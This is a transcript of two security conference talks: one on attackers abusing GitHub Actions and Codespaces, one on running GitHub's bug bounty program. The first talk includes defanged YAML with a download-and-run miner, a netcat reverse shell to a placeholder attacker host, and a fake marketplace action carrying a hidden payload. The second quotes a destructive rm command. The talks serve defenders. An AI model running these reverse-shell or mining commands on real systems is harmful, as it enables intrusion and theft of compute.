And so companies are developing their own plugins and providing them on the marketplace, and I think this number is already higher today; it keeps increasing. People are making automation available so that you don't need to write your own action: you basically just call other people's tools and integrate them into your pipeline, into your repository. Okay, but if anyone can upload actions, what happens when attackers do that too? What if I'm a malicious user and I upload something to GitHub? As far as I know, there is no security review being done on GitHub Actions today. There is no verification. So if I upload a malicious action, there are no checks being done on that front. So what are attackers doing with that? Basically, they're abusing GitHub Actions to mine cryptocurrency. It's free money, right? This is one of the YAML scripts from one of the actions I analyzed; there are hundreds of these still available on GitHub today. What they're doing at the end here, you can see, is running a node.exe that is actually XMRig, a Monero crypto miner, along with a username and so on. I'm not big on crypto, but this is what they're doing. Some attackers even limit the CPU percentage to avoid detection; in this command they cap it at around 70% so they don't get flagged. The `strategy` part at the top is basically for parallelism, to scale your jobs and deploy multiple runners at the same time to make more money faster. And this part here is using third-party actions; the `uses` parameter means I'm calling a third-party action. This one is actually provided by GitHub, and it downloads the code of your repo into that VM, into that runner. But this other one is not provided by GitHub. It's a third-party action by someone else.
Someone made an action to retry your action if it fails, and attackers are already using it: leveraging this legitimate third-party action for their own gain, their own profit. This is really interesting. Here they're abusing a Windows runner, but I have examples for Linux and macOS as well. So I analyzed this third-party GitHub action, and it's actually a legitimate one; attackers are just using it for their own purposes, which is interesting because it's like they know the platform better than those of us trying to build pipelines and use actions. They're doing it better than us here. And of course, the node.exe there was a malicious file. It was flagged by VirusTotal and so on. So yeah, a bad thing. Another example here, now using PowerShell, still with Windows runners. This script is really interesting because I found hundreds of repositories with the exact same code: basically downloading the crypto miner, extracting the file, and running it there. Pretty basic stuff, but they're making free money, right? Until the GitHub security team can flag it and monitor for suspicious activity, they're making free money. These are some of the repos with the same code; there are probably a hundred more. We reported them to GitHub, and I think they took most of them down, but the attackers were able to just create a new user, create the same repo or a new one, and start mining again. It's a cat-and-mouse chase in this scenario, because it's hard to block, especially since when GitHub blocks the actions, they block that specific repo, not the user. So if the user creates another repo, they can still leverage Actions to continue mining. Some other examples here now use Linux. Same thing.
Just downloading and extracting the crypto miner, then running it. XMRig again. You can find these just by doing a basic code search on GitHub: look for "xmrig" inside the .github/workflows directory, the folder where you're supposed to store your actions, your automations, and you'll probably find some examples. Same idea, just mining cryptocurrency. And the latest example I have here is abusing macOS. As I said, you can also run a macOS runner, a macOS VM, through GitHub Actions, which runs on Azure. This one seems like a legitimate thing, some "core book" project, whatever; it's Chinese, I guess, and there are some instructions there. But when you go check the YAML file, that's where it shows exactly what's happening. You can see there's an "xmrig no fee" binary, and the file is down here as well. That's the file it's using. Basically, it's a crypto miner. I'm not a macOS expert, but I asked for help from my team to analyze the binary, and it's definitely a crypto miner as well. Not a good, not a legitimate file. I'm not sure why they named it this "core book hacking task" thing, but as you can see in the previous examples, they always try to make it sound legitimate: names like "CICD", "run tests", things like that, to try to mask it. It's not that convincing, right? Okay. So if you ever see this on a repo, where you go to the Actions tab and it says "GitHub Actions is currently disabled for this repository", it probably means they did something bad with that repo and it's been blocked: you're no longer allowed to deploy the VMs, the runners, inside Azure to run your automation.
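For reference, the mining workflows just described tend to share a recognizable shape. A defanged sketch of that pattern follows; the names, the URL, and the miner flags are all placeholders, not copied from any real sample:

```yaml
# Defanged illustration of the mining-workflow pattern; nothing here points at a real payload.
name: run tests                    # innocuous-sounding name used to mask the real purpose
on: [push]
jobs:
  test:
    strategy:
      matrix:
        copy: [1, 2, 3, 4]         # parallelism: one runner VM per matrix entry, more "free" compute
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4  # the legitimate GitHub-provided checkout action
      - run: |
          # the download / extract / run sequence seen across hundreds of repos
          curl -sL https://example.invalid/miner.tar.gz -o miner.tar.gz
          tar xzf miner.tar.gz
          ./xmrig --max-cpu-usage 70   # CPU capped to evade detection (flag illustrative; wallet/pool args omitted)
```

Spotting this shape (matrix fan-out plus download-and-run of an opaque binary) is a useful heuristic when auditing workflow files.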
But as I said, if you create a new repo, that repo is allowed to deploy actions again, so it's not really effective: attackers can just create new repositories and start mining cryptocurrency again. Just another example here. Okay, so after this introduction: the main focus of my research was malicious third-party GitHub Actions. As I said, you can leverage the marketplace to use GitHub Actions developed by other people, but what happens if those other people are malicious users? What I did was create a separate action in another repo and call it from my own repo. That was the goal of my research. Of course, I didn't upload it to the marketplace, otherwise I would get fired, but yeah. The idea is that you have to treat your GitHub Actions as third-party dependencies, right? Just like the libraries you import into your code without knowing where they come from, you need to treat your actions the same way. A few things to highlight here. There is one validation from GitHub that checks the creator of a GitHub action; you can see this blue check mark. It's not like the Twitter check mark, where you pay and you get it. No, it's a domain validation for the company or user, and most companies will try to get it. But again, this is not a security verification. It doesn't mean the action was checked for malware, backdoors, or crypto miners. The other thing is that every action is a public repository. So when you're calling actions with `uses: actions/checkout`, you can actually go to that repo and see the code that's being downloaded and run inside your runner, inside your VM. If you go to github.com/actions/checkout, you can read that code.
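A common hardening pattern that follows from this "treat actions as dependencies" point: pin third-party actions to a full commit SHA rather than a mutable tag, so the code you audited is exactly what runs, and grant the workflow token only the permissions it needs. The action name, SHA, and secret name below are placeholder assumptions:

```yaml
name: build
on: [pull_request]
permissions:
  contents: read    # least-privilege GITHUB_TOKEN: read-only, cannot write back to the repo
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Pinned to a full commit SHA (placeholder) instead of a tag like @v3,
      # so a later tag move or force-push on the action's repo cannot change what runs.
      - uses: some-org/some-action@8f4b7f84864484a7bf31766abe9204da3cbe65b3
        with:
          token: ${{ secrets.MY_API_TOKEN }}   # stored as a repo secret, never hard-coded in the YAML
```

A tag like `@v3` points wherever the action's maintainer (or whoever compromises their account) moves it; a 40-character SHA is immutable.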
And if you have the proper tooling, static analysis for example, you can analyze that code and see what it's doing. The ones under the `actions` user or organization are provided by GitHub, so technically they should be legitimate, unless someone has compromised that account. Okay, so this is what I was able to do during my research. Not just exploiting a third-party action: technically you can't run interactive commands inside your VMs, your runners, but I was able to do that, to run an nmap scan inside the Azure network, and to do a reverse shell from the runner to an external server. You can also leverage your runners, since they're VMs, they're servers, to pivot and attack other targets, either inside Azure or even outside, because they have outbound connectivity as well. This is just an example from the nmap scan. The first one is my actual runner, my VM there. This is an old screenshot, but you can see some well-known ports, and there's one port, 8084, with a server called Mono XSP. This one was interesting because it's a very old ASP.NET server that was sitting there, and I couldn't figure out why. I think it was for health or monitoring purposes, internal to Azure. What's interesting is that this web server was the only one enabled by default; Apache and nginx were also installed, but not enabled. On the latest versions of the Actions VM, the Ubuntu one, this server has been removed. I'm not sure exactly why, but it's not even inactive anymore; it's just not there. So here is where I did the reverse shell from the runner. The Ubuntu VM comes with a lot of tools preinstalled, and one of them is netcat. But the netcat version on Ubuntu is limited: you can't use the -e option.
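For context, the classic workaround when netcat lacks `-e` is the named-pipe trick. A sketch of how such a step could be written in a workflow follows; the host and port are placeholders, the talk did not show this exact code, and running anything like it against infrastructure you don't own violates GitHub's terms of service:

```yaml
# Illustration only: a reverse-shell step on a runner whose nc build has no -e flag.
jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      - name: reverse shell via named pipe
        run: |
          mkfifo /tmp/f
          # the shell reads commands arriving over the TCP connection via the pipe,
          # and its output is sent back over the same connection
          cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_HOST 4444 > /tmp/f
```

From a defender's perspective, outbound connections like this from a CI runner to an unknown host are exactly what egress monitoring on runners should flag.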
So this was one way; of course, there are other ways, including downloading a fresh netcat build from scratch, to create a reverse shell to my instance. You can see this is the demo script, and this is my EC2 instance on AWS: I'm basically opening the backdoor, listening there, and waiting for the connection from my action. We can see the information here: the username is `runner`, which is what the VMs are called, and we can see this is from Azure, the VM provided by GitHub for this scenario. So now I have interactive commands, right? I don't need to edit the YAML file, commit, and make a pull request every time, then wait for the changes and wait for a VM to get assigned to my action. With this reverse shell I can run any command I need, any time. There is a limit here: I believe every job has a six-hour limit, so you only have six hours to interact with that VM, but that should be enough for research purposes. And each runner runs for up to 72 hours, so you have about three days until your runner gets disconnected. Once the runner is disconnected, it's shut down and you don't have access to it anymore. Anything you're doing inside that VM, you need to upload, copy, or collect as artifacts; otherwise you lose access, you lose everything that's there. And since I can do reverse shells from the runners to my server, I can also issue commands from my server to my runners, such as scanning or attacking other targets, even outside of Azure. This pivoting part I didn't actually execute, but it's a possibility as well. Okay, now what happens if someone uploads a malicious action to the marketplace? Similar to what I showed on the previous slide: I created this code in a separate repo, and then from the first repo I called it.
That's similar to how the marketplace works: you're just calling a public repository from another location, another user. That's what I did. So yeah, "hello world", the example from the GitHub Actions documentation, but then it calls this shell script, which is basically the same one I showed earlier, the one that opens the backdoor, the reverse shell. What happens is that if I published this to the marketplace, anyone who used it (and of course I wouldn't label it like that, I'd try to make it less suspicious) would create a reverse shell to my C2 server, my EC2 instance, whatever I had there. Same thing here: this is the demo file calling the third-party action. This is another repo, GHA-test; they're all public repos if you want to take a look. There's not a lot there, but this is what I'm doing: the `uses` line calls the third-party action, fake-GHA, which runs that code, which in turn gives me the same reverse shell I showed you earlier, but now from a third party. So be careful with the actions you're pulling from the marketplace. Since there's no verification, as far as I know, if you're not validating them, this can happen in your environment as well. And once attackers are inside that environment, once they control those VMs, there are a lot of credentials and tokens there, including the GitHub token, which may allow them to read your repo information, or even write back to your repository depending on the permissions. Things like CI/CD or supply chain attacks can happen here as well.
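The fake-action pattern described above boils down to an action.yml that quietly runs an attacker-controlled script alongside its advertised behavior. A defanged sketch of what such a marketplace action could look like; the names and the setup.sh file are placeholders echoing the fake-GHA demo, not its actual code:

```yaml
# action.yml in the attacker's public repo; this is what a consumer's `uses:` line pulls in.
name: 'Hello World'                # innocuous branding, as in the GitHub Actions docs example
description: 'Greets someone'      # nothing here hints at the payload
inputs:
  who-to-greet:
    description: 'Who to greet'
    default: 'World'
runs:
  using: 'composite'
  steps:
    - run: echo "Hello ${{ inputs.who-to-greet }}"   # the advertised behavior
      shell: bash
    - run: ${{ github.action_path }}/setup.sh        # "setup" script that actually opens the reverse shell
      shell: bash
```

Nothing in the marketplace listing would surface that second step; only reading the action's repository, as recommended earlier, reveals it.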
I know I'm almost out of time, so: some countermeasures related to GitHub Actions. It's not great; as far as I know, there are no tools today that actually check your actions for malicious intent. I've been working on writing rules for existing static analysis tools to provide that, and I'll probably make them public very soon. Maybe in the next talk Logan can say whether GitHub is working on something like that; it would be beneficial. But basically: make sure your actions have least-privilege permissions. Don't grant write permissions if you don't have to, because while that runner, that VM, is alive, if someone compromises the token, they can compromise your repo. Another thing that used to happen, especially in the beginning: people could fork the original repo and send a pull request back to it, and that would trigger the action. So people were forking GitHub repos back and forth, triggering actions that would spin up runners and mine cryptocurrency, on the legitimate account rather than the malicious one. That also happened, so GitHub added a protection, enabled by default: when someone sends a pull request from a forked repo, it doesn't trigger any actions unless you approve it, unless you recognize that user as a contributor to your project. And of course, this isn't just about the GitHub token but any token you use. First, basic stuff: you shouldn't hard-code your tokens inside the YAML file. That's a basic security practice; you shouldn't do it. GitHub has a feature called secrets, where you can add all your tokens and then reference them by name. I'm not sure if I have an example here, but that way the token is protected even from your own developers; they can't see it anymore after
you add them there. So protect those secrets as well, because they can give access to other tools. Just some examples here: if you're not using Actions, disable it. That's the basic approach; if you're not using a service or a tool, remove it. You can disable all actions there. And this one is the setting about forked repos: require approval for first-time contributors, to avoid someone triggering your actions and compromising your environment. Okay, I'll try to be really fast here. The next slides are about Codespaces, related to the research my friend did, as I said; I'll just present a few things. The same way GitHub Actions is based on Azure Pipelines (as far as I know, even some of the same people worked on both projects), GitHub Codespaces is based on VS Code online. The idea is to have an IDE in your browser, so you can quickly spin up your projects and start coding directly from the browser without setting up dependencies and libraries. Sometimes when a developer joins a company, it takes them at least a few days to get their environment set up; Codespaces tries to avoid that by creating the virtual environment for you.
When you create a Codespaces environment, you basically get this long URL, which specifies your username, the codespace name, a random ID, and the port; you can forward a port from that codespace and expose it. We described this in an article we published, I think in January: if I can leverage that, and I think each codespace gives you up to 512 gigabytes of storage, I can use a codespace as my C2 server to deliver malicious files to other people. And if I provide that URL, well, it's coming from GitHub, so it must be legitimate, right? There's nothing new here; it's just like what attackers do with Google Drive and similar services, but it can be a way of exploiting and tricking even developers who aren't aware of it. So we did that: we enabled directory listing, served it from our codespace, and showed we could provide malicious files there, open directories and all that. We published the article around January, and then just a few weeks ago we found out that attackers are already leveraging this, already abusing Codespaces to deliver malware, to deliver malicious files. We saw this tweet about two weeks ago. So this attack vector, leveraging Codespaces to deliver malicious content, is probably going to increase. Just be aware of that in your environment, especially if your developers are using Codespaces; you should be very careful. Okay, that's all I had for today. If I still have time, I'm open for questions; if not, I'll be here for the next talk. Thank you.

Any questions? Do we have time for questions? Okay, go ahead.

"It's not a question specifically, but it's kind of feedback on something you mentioned." Sure. "So there is a thing, I don't know if you're familiar with it: StepSecurity Harden-Runner. It's a GitHub action you can put at the top; you put it
the very first one in your job, and it will basically intercept things: it modifies the kernel in the VM, you can set firewall rules, it will snoop on things, and it will block execution of untrusted code. So basically it's a way to harden the rest of your execution." Okay, so is it like a container inside the action, inside the VM? "It's effectively a little daemon that runs at the very top of your job, and then everything that runs after it is subject to it; it can apply firewall rules that basically prevent those things you were mentioning." Sounds good. So yeah, I'm working with OPA, Open Policy Agent, to develop some rules in Rego to analyze, let's say, a YAML file focused on GitHub Actions: is this YAML file running a malicious Linux command, or is it running a crypto miner? That's what I'm working on, and I should have it available very soon. So yeah, thanks again for sticking around until the end, and please stay around for the next talk from Logan. Thanks, everyone.

So we're going to take about a 10-minute break before the next talk. And don't forget, there's a raffle at the end of the day: we have books, rubber duckies, Flippers, a bunch of stuff to give away. So stay here.

All right, welcome to the last talk of Nordsec 2023. We still have a little bit of music. You just heard about how to pwn GitHub, and now we're going to talk about how to make money doing that. We have with us Logan McLaren. He's been a security enthusiast since getting online in the '90s, and he now focuses on helping grow GitHub's bug bounty program. In his free time he dabbles in powerlifting, CTFs, and retro gaming. So please give it up for Logan.

Well, good afternoon, everyone. I'm glad I have a captive audience here, with a raffle coming after this as well, so thanks for hanging out. The goal today is to chat a little bit about GitHub's bounty program, it being one of the bigger ones out there,
but more so focusing on lessons from years of running the program: ways we've learned not to do things, ways we have learned to do things. The key stuff comes at the end, the takeaway slides as it were, for folks who are either looking to submit to bounty programs, ours or otherwise, or anyone looking to set up a bounty program or work on one as an engineer. So hopefully my slides cooperate; we had some technical difficulties. Here we are. I'm a senior product security engineer at GitHub; I've been there since about 2019. A long time ago I used to run a whole bunch of hacker zines and stuff that nobody's ever heard of, but that was always good fun. I am a kilt enthusiast, as you can probably guess from this; I am actually Scottish, I haven't just appropriated the kilt. Professionally I've worn many hats, everything from support to professional services to engineering, so I never stay in one place for too long, but GitHub's kept me hooked for a while. Before we dive in, just to get a feel for the audience: who here has submitted bugs to a bounty program before, or is at least familiar with it? Raise your hand. Magno, perfect. And perhaps a more niche audience: who here works on a bounty program? Okay, more than I was expecting, which is pretty cool. So this is going to be well rounded. Talking about the GitHub program, just to set the stage: we started back in 2014, and we've been working with HackerOne since 2016, so a lot of these numbers look at 2016 onwards, because that's when we have metrics from. During that time we've paid out a little over 4 million US dollars in bounties across about 1,350 reports as of this morning. Those are reasonably large payouts compared to a lot of other programs: the overall range runs from $617 at the bottom end up to $30,000-plus depending on severity. So if you can find something pretty gnarly, you can walk away with a good payday. But obviously a lot of that's
changed over time. I like to say it's aged like a fine wine; it hasn't gotten corked yet, so things are pretty good. We started out as sort of a side gig for our appsec team, and it's changed pretty significantly since then: we're now a team of four full-time engineers who are just doing bug bounty work, dealing with the various projects we have on it, but also looking at our overall lifecycle for vulnerability work. As our scope has changed a lot, our payouts have changed a lot: we originally paid $1,000 to $5,000, and as I just mentioned, it's about six times that now. The big part of that, as I said, is the change in scope. Thinking back a couple of years, GitHub was primarily source code management and not a lot else; now we have Actions and Codespaces and everything else that we just heard about, and many other bits and pieces, so there's a lot more surface area to look at. We've also been looking at other ways to expand bug bounty, and this is going into the takeaways a little early, but we're looking at ways to bring this into our release cycles and at other opportunities to collaborate, both internally and externally. The process we have is about what you'd expect from a bounty process; really a lot of it is bug triage work. First off, we review any reports that come in just to make sure they pass a sanity check: are they relevant, sort of what you'd expect. Then we reproduce them, make sure they're actually reproducible so we can continue an investigation, and validate that there's something we care about and want to pursue further. If there's any ambiguity, we pull in the engineering or product teams to make sure everyone's got a good picture of it. From there, we fix it, simple enough, and then pay things out. Programs do payouts in different ways; our current setup is that we pay out whenever things get fixed, which could be a
couple of days, a couple of weeks, or a couple of months, but that way we're ensuring our customers are actually protected by the time any information gets out into the world. When we get reports, the key thing is to figure out what's actually going on. We want to understand the actual vulnerability: not just whether it's something we care about from a security standpoint, but its overall scope. Quite often when I've looked at stuff in bounty programs, you'll see reports come in that are a little unclear, and you may have wildly varying severities (that's a tongue twister) as they evolve over time. We want to pin that down in advance, so that when we push it to our engineering teams to formally fix it, and continue our investigations with our CERT teams and whatnot, we can prioritize it properly. The next thing is: can we take this and actually increase the impact? Does this enable other attacks? Are there other things we need to focus on beyond whatever was reported to us? I think the key takeaway here, for our program and many others, is that it's not necessarily the job of us on the bounty side to increase that impact; we just want to understand it. If you submit a report and the impact looks fairly minimal, it's on you as the reporter to demonstrate what that impact is, to make sure the severity is clearly represented in terms of a payout. That said, we do our due diligence on it nonetheless. Next is understanding the trends we're seeing overall, in our program, other programs, and the security world in general. We want to understand what we're seeing across the overall ecosystem: if there are new vulnerabilities popping up in Rails or Git, we want to understand that well, so we can be prepared and get out ahead of it. And the other part of that is
to retrospectively look at the reports we're getting: take that data, feed it back into our overall SDLC, and be able to say, hey, we've got a lot of problems in this particular product area, or we're seeing this type of problem persist across many product areas, so let's focus on that going forward in our overall lifecycle. The last part, as I mentioned earlier, is that we collaborate with our CERT teams a lot. We want to understand the blast radius of these things: is there user or customer impact, or is it just a security software bug that hasn't been exploited? As part of understanding that overall impact, we work with our CERT teams, both internal and customer-facing, to send out notifications if we need to, or at least make sure we understand the depth of what happened. I've been talking about affecting users and customers, and a big part of that is that we have two different product streams: we run a SaaS offering as well as an on-prem product. With GitHub Enterprise Server we do releases every couple of weeks and a major release every quarter, but there are different constraints that come with that. We're effectively shipping the same code for both; if you ever download GitHub Enterprise Server and you're crafty enough, you can basically get a lot of the source code out of it. The fun part is that we can ship fixes really quickly on github.com, in hours or a couple of days, but shipping something on-prem means going through a full release cycle, which could be a few weeks; if we miss backport deadlines, it can get extended a little further. The key takeaway here: if something affects one, it probably affects both, so when we look at fixes, payouts, and disclosures, we want to make sure we've got full coverage across both. One too many things here, so
again, all of this needs to get done on top of the investigations we've been talking about. If we need to cut CVEs, we want to make sure the researchers are properly credited, and if we're going forward with disclosure, which we currently do in a limited fashion for anything that leads to a CVE, we want to make sure there's full coverage: fixes available for customers on both github.com and GitHub Enterprise Server. From there, figuring out payouts. Touching on this a little more: figuring out severity rankings, whether you want to use CVSS or some other framework, or do things yourself. We have opted to use our own threat model. We think we have a pretty good understanding of how things affect us and our customers, rather than a genericized approach like CVSS, and the key part is that as we figure these things out in our ecosystem, we want to understand the actual risk. We've certainly seen cases where you plug a vulnerability into CVSS and it comes out at 9.5 or something, but when you actually consider exploitability and impact for a SaaS offering, specifically github.com, it may be significantly reduced. So we use CVSS as a sanity check, certainly as a tiebreaker as we deliberate things as a team, a reference point. Once we're through all that, we figure out how not to screw up disclosure. This is much trickier than it may sound if you haven't had to do it before; I've been on the receiving end of it from a bug, and I can't overstate how tricky it actually is to line up. One of the first things I'll note, because there have been some really good examples of this in the Twitterverse lately, is that the more you work in public for a bug bounty program, or really anything, I suppose, the more open your staff and company are to harassment and
scrutiny. There's a great example with Bugcrowd from a couple of days ago; you can poke through Twitter and I'm sure you'll find it. Overall, cracks will begin to show quite quickly, so you want to make sure you're putting on your best face, that you understand the implications of all this, and how it's going to affect the rest of the ecosystem as well. Certainly, if there are other products out there built on similar underlying technologies, make sure there are opportunities to collaborate before things get fully disclosed. Right now we do limited disclosure, which is a summary of the report plus a researcher-provided summary, along with severity, payout, and timelines, but not necessarily all of the back-and-forth, and not the original report with the exploitation details. Some programs opt for what HackerOne calls full disclosure, which is absolutely everything that went into it. We do want to find a way to share as much as is feasible. I talked about limited disclosure with HackerOne; every platform has some sort of tool for this, it's not specific to them. The key thing is that everyone of course always wants more, right? The more details are out there, the easier it is to hunt on equivalent programs, or basically to contribute back to the overall bug bounty world. So we are trying to move toward more disclosure, whether through full disclosure or just more reports in general rather than just CVEs. We'll see how that plays out over the coming months, but certainly, if you've got experience working with this, I'd love to hear from you and chat about the pros and cons, so feel free to come up and chase me down after we're done here. Shifting gears a little into one of the other areas that's a little fishy for bug bounty programs: phishing, of course. This is something that's out of scope for virtually every program out
there; we're no different, but that doesn't mean it should be just flat-out ignored. Whenever you're looking at phishing stuff, the key thing is to understand the difference between a mechanism that might enable phishing and one that requires phishing. So if you look at, say, a CLI tool, or really anything: if you run a command and you expect it to do something, it should do that thing. If you run a command and it does something else because some very plausible, legitimate scenario has taken place, like another file in the right path location, and it now does something malicious, that's something you can defend against, and that's where we look at this as a defense-in-depth opportunity: we want to find a way to improve that, and it's a safeguard. The flip side is if somebody says, hey, just run our `rm -rf / --no-preserve-root`: that's a you problem; that's not something you can necessarily protect against technically. We've approached this, and we've seen a few other programs do it as well, with this idea of thank-you payouts. It's for something that doesn't necessarily register on what we consider low severity, but that we still want to acknowledge: this is a good finding, but not necessarily a security threat, and we are going to take some sort of action on it. A small award, whether it be swag or, you know, a smaller cash award than our minimums would normally be. And really the takeaway from this is Murphy's law, right? If there is a way for somebody to do something wrong, they're going to do it wrong, so if you can have secure defaults, it's always, always preferable. That's certainly not to suggest that we're perfect, nobody in the world is for this stuff, but it's something to strive towards, and really why we've adopted this type of setup.
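The "another file in the right path location" scenario above is the classic untrusted-search-path problem, and it is defensible with a secure default. A minimal sketch (the trusted directory list is an assumption for illustration, not any particular tool's configuration): resolve helper binaries only against directories you control, so a planted executable in the working directory or the user's `PATH` is never picked up.

```python
import os
import shutil
import subprocess

# Directories we explicitly trust. The current working directory and the
# user's PATH are deliberately absent, so a malicious "git" dropped into a
# cloned repository cannot be resolved by accident.
TRUSTED_PATH = os.pathsep.join(["/usr/local/bin", "/usr/bin", "/bin"])

def run_trusted(tool: str, *args: str) -> subprocess.CompletedProcess:
    """Resolve `tool` only against TRUSTED_PATH before executing it."""
    resolved = shutil.which(tool, path=TRUSTED_PATH)
    if resolved is None:
        raise FileNotFoundError(f"{tool!r} not found in trusted directories")
    # Absolute path, no shell: nothing outside TRUSTED_PATH is consulted.
    return subprocess.run([resolved, *args], capture_output=True, text=True)
```

The design choice here is the secure default the talk advocates: the legitimate case works unchanged, while the "plausible but malicious" case simply cannot occur.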
Another question that comes up quite a bit, usually from sponsors, is: why would you implement a bounty program instead of spending that money on red teaming, or external pen testing, or more lawyers, right? And the biggest thing is, it's not an instead-of; it's an in-addition-to. When we talk about defense in depth, this is one part of a much bigger picture. The way I like to describe it, despite this having been thoroughly disproven by science at this point, I think, is: if you can have a thousand monkeys writing Shakespeare, you can have a thousand security researchers finding some gnarly bugs. You're opening things up to a world of eyes that otherwise might not be there, and if you can incentivize that, ideally through having a very good, responsive, transparent program, or having a lot of money, or both, it makes that a lot easier. So one of the other parts of this, in terms of having eyes on it and getting the best of both worlds, is looking at opportunities like invite-only programs, VIP programs, and live hacking events. A lot of this does come with budget, but there are ways to get around that in many cases, and what this lets you do is attract very specific groups of folks to look at very specific things. So where it may be a lot of back and forth to engage with another company to do a deep dive on, say, Codespaces, from the last presentation, if we can say, hey, we want to get 30 people in a room as part of a live hacking event, and here are some extra cash bonuses if you're able to find IDORs or crits or something on Codespaces, we now have an opportunity to do that, and people are flocking to come into those events. Even if they don't normally work on our program, or maybe even on the platform, there are still possibilities to pull them in. So that is one place where working with somebody like HackerOne or Bugcrowd or any other platform can be super helpful. But for us specifically, between invite-only
programs, where we've found folks who frequently contribute high-quality stuff to our program, and live hacking events, we've had great success. Shifting gears to internal, and I say internal meaning internal to me: bounty as a way to learn. I think this is a little bit underrated as an entry point into the security world. Similar to what I mentioned about having a background in support, this is a great way to get new perspectives on things. If you have a background in engineering, you're going to be using all of those skills, but you're now putting a security focus on them. If you have a human-facing background, you're still doing that, and building security expertise on top of it. And if you're already in security, you're now building external-facing expertise, where you have to be able to communicate these things back and forth and do a lot of negotiations with the internal groups that are part of it. If you're coming in reasonably new to the overall security or engineering world, you're getting access to a lot of stuff that you otherwise wouldn't have access to. I've worked at and with companies where it's unheard of for support folks, or really any customer-facing folks, to have access to source code for a product; certainly not the case for us. But when you're working with these problems, having to debug them, having to understand severity, doing investigations, you're getting your hands pretty deep into these things and working with the experts in these different areas. Similarly for understanding systems architecture, and I think there were some great talks earlier on this: when you're going through and taking a look at a vulnerability, it's almost never "hey, this API is vulnerable." It's "this API is vulnerable because the message coming through to it goes through three or four other places and we don't have full lineage on it." Whether it be privacy stuff or deserialization
vulnerabilities, whatever, there are many, many ways to dig into this. And lastly, looking at engagement with other teams and companies: I've certainly had no shortage of working with different engineering teams, external vendors, and whatnot to dig into this stuff, and I think that's true for most work in this world. I look at that as a big plus that certainly comes with some fun sometimes. So, moving into what I call the picture slides: the takeaways for folks. This one is for anyone who's looking to submit bounty reports, again, to us or anyone else. There are a few key things I'd recommend. The first is: treat your bounty reports as UDP traffic. Fire and forget. Send them off; if it gets looked at, that's fantastic. If you're going through and doing constant bumping on reports, and if you've been on the receiving end of that, where somebody's following up by email every six hours, you know it's not a great way to get attention. If you're looking to bump stuff once a week or so, that's usually pretty good, but in general, what I've seen, especially from the folks who are pulling in a lot of money, is that they will put in very high-quality reports, send them off, and let them be. If they need to follow up, they will, and if they don't, they won't. Next is to have a pretty good understanding of what you're reporting. There are a whole lot of cases where, if there's smoke, there's fire, so if you see something, say something; absolutely nothing wrong with that. But if you are submitting stuff and you think there's going to be a bit of back and forth around it, it's really helpful to be prepared for that and to have an understanding of what you're looking at. A key example I'll give here with GitHub is our import function, which can pull stuff in from other source code repository providers, or even on-prem stuff, and we get reports probably about once a week claiming SSRF vulnerabilities with it, because you can provide a URL and then
GitHub reaches out to that. That's exactly what it's designed to do. So understanding that context can be quite helpful, both for you, making sure you're not wasting your time, and once a report goes in: if you really need to push something through, you can do that. Next up, when you're submitting to any program, understand the scope they have and the rules they have around disclosure and where information needs to go. Nothing is worse than having a report come in with some pretty gross stuff and somebody then realizing it's on Pastebin somewhere else, that they've tried to include stuff. Not a great look for anybody at that point, because now you have a security incident in addition to a bug. The other part of this is, if you're looking to work with programs long-term, we have a lot of folks who come back, and I think for a lot of bounty programs out there, there's a lot of information about repeat, I'd say repeat customers, repeat submitters. It's really helpful to understand that there are, of course, humans on both sides of this relationship, so if there are ways to understand how people tend to approach reports on both sides, if there's stuff that is generally asked for that maybe isn't part of the program, whether it be video POCs or scripts, whatever, and you can come armed with that, it's going to save everyone a lot of time and generally builds things up from there. And the last one, which I think is the most important part, is to avoid bullshit. We talked earlier about having at least a decent understanding of what you're submitting; if you're sending stuff in just to say you've submitted bounty reports, it's not particularly helpful, and a lot of programs will actively punish this. Whether or not that's right is up to the program owners, and that's a different story; I would generally encourage folks to be lenient with closure
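The distinction the importer example draws is worth making concrete: fetching a user-supplied URL is by design; SSRF only enters the picture if that fetch can be steered at internal infrastructure. A hedged sketch of the kind of guard a service might apply (this is illustrative, not GitHub's actual importer code): resolve the host and reject anything landing in loopback, private, or link-local address space.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_import_url(url: str) -> bool:
    """Return True only if the URL is http(s) and its host resolves
    exclusively to public addresses, so a user-supplied import URL
    cannot be used to probe internal services."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```

Note that a resolve-then-fetch check like this is still subject to DNS rebinding between the check and the request; real deployments typically pin the resolved address for the actual fetch or route importer traffic through an egress proxy.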
states for reports, but look at what it takes to be able to submit. If you wind up getting dinged for sending junk in through a program that's a bit less generous around those closure states, you can wind up nuking your career before it starts. Shifting over to folks working on a bounty program, because I know there are a few here, which is nice. The key thing to remember is that when researchers are doing well in your program, when they win, you win. If you can continue to incentivize folks to come back, and make it worth their time and worth your own time, it's good for everybody. Next up, talking about closure states and whatnot: the more you can help folks grow, especially if your program gets a lot of, let's say, less experienced folks submitting reports, and there are opportunities to contribute back through those reports, that's a great way to do it. I mentioned punitive closure states on some of these platforms. We use something called the informative status on HackerOne, which carries no reputation hit. If you submit a report and we say, hey, it's invalid, a default might be to mark it not applicable, which would be a reputation hit; we will tend to opt for informative, which is no reputation hit, and we always try to give a quick explanation as to why that's the case. So if you send something in with that SSRF scenario I talked about earlier, we're actually going to provide an explanation of why we don't consider it to be a vulnerability or a problem in general. Again, if you can keep folks coming back that way and keep educating them, everyone comes out better.
